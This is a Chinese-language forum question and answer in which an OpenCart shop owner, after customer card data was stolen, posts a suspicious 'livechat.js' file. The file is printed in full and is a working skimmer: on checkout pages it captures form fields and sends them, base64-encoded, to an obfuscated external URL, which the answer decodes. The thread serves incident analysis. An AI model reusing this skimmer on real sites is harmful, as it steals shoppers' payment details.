Opencart livechat.js恶意软件脚本？

Question

我有客户的信用卡信息从我的客户网站被盗。我看到这个livechat.js脚本在网站上运行。网站上没有livechat功能，我相信可能是恶意软件。我如何才能确定脚本是从哪里启动的，以及这个脚本到底在做什么？

https://www.hergbenet.ro/wp-data/livechat.js

function IrDvbNXumt(e) {
    return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g, function(e, t) {
        return String.fromCharCode(parseInt(t, 16))
    }))
}

function lmVibHTBLP() {
    Array.from(document.getElementsByTagName("input")).forEach(function(e, t) {
        null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this, '0')") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '0');" + e.getAttribute("onchange"))
    }), Array.from(document.getElementsByTagName("select")).forEach(function(e, t) {
        null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this, '1');") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '1');" + e.getAttribute("onchange"))
    }), Array.from(document.getElementsByTagName("textarea")).forEach(function(e, t) {
        null == e.getAttribute("onchange") ? e.setAttribute("onchange", "SAcSpFtVQg(this), '2'") : -1 == e.getAttribute("onchange").search(/SAcSpFtVQg/i) && e.setAttribute("onchange", "SAcSpFtVQg(this, '2');" + e.getAttribute("onchange"))
    })
}

function SAcSpFtVQg(e, t) {
    var n = [];
    n.push("url%" + location.hostname), n.push("type:2"), "1" != t ? e.value.length > 0 && (0 == e.name.length ? n.push(e.id + "%" + e.value) : 0 != e.name.length && n.push(e.name + "%" + e.value), aQwCiGbwKo(n)) : e.value.length > 0 && (-1 != e.id.search("zone|region|state") || -1 != e.name.search("zone|region|state")) ? (e.value.replace(/[^-0-9]/gim, ""), e.value, 0 == e.name.length ? n.push(e.id + "%" + e.options[e.selectedIndex].text) : 0 != e.name.length && n.push(e.name + "%" + e.options[e.selectedIndex].text), aQwCiGbwKo(n)) : (0 == e.name.length ? n.push(e.id + "%" + e.value) : 0 != e.name.length && n.push(e.name + "%" + e.value), aQwCiGbwKo(n))
}

function aQwCiGbwKo(e) {
    if (JSON.stringify(KZgKcnPvnh) == JSON.stringify(e)) return !1;
    KZgKcnPvnh = e;
    var t = 89999 * Math.random() + 1e4,
        n = JSON.stringify(e),
        a = document.createElement("img");
    a.width = "1px", a.height = "1px", a.id = t, a.src = atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=") + "?image_id=" + IrDvbNXumt(n), document.body.appendChild(a), setTimeout(document.getElementById(t).remove(), 3e3)
}

function Default_Send() {
    var e = [];
    e.push("url%" + location.hostname), e.push("type%2"), Array.from(document.getElementsByTagName("input")).forEach(function(t, n) {
        t.value.length > 0 && (0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value))
    }), Array.from(document.getElementsByTagName("select")).forEach(function(t, n) {
        t.value.length > 0 && (-1 != t.id.search("zone|region|state") || -1 != t.name.search("zone|region|state")) ? (t.value.replace(/[^-0-9]/gim, ""), t.value, 0 == t.name.length ? e.push(t.id + "%" + t.options[t.selectedIndex].text) : 0 != t.name.length && e.push(t.name + "%" + t.options[t.selectedIndex].text)) : 0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value)
    }), Array.from(document.getElementsByTagName("textarea")).forEach(function(t, n) {
        t.value.length > 0 && (0 == t.name.length ? e.push(t.id + "%" + t.value) : 0 != t.name.length && e.push(t.name + "%" + t.value))
    }), aQwCiGbwKo(e)
}
var KZgKcnPvnh = [];
window.onload = function() {
    -1 != location.href.search("checkout") && (Default_Send(), setInterval("Default_Send()", 3e3), setInterval("lmVibHTBLP()", 1500))
};

Answer 1

您应该安装并运行Wordfence Security – Firewall & Malware Scan或Sucuri Security – Auditing, Malware Scanner and Security Hardening并检查结果。

例如，如果你解码这个atob("aHR0cHM6Ly92YWxkYW1hcmtkaXJlY3QuY29tL3dwLWRhdGEvdmFsaWRhdGlvbi5waHA=")，你会看到这个url https://valdamarkdirect.com/wp-data/validation.php。这是你所意识到的吗？

在大多数这样的情况下，您应该首先向您的客户说明，e-Shop是已折衷的，并向专家寻求帮助。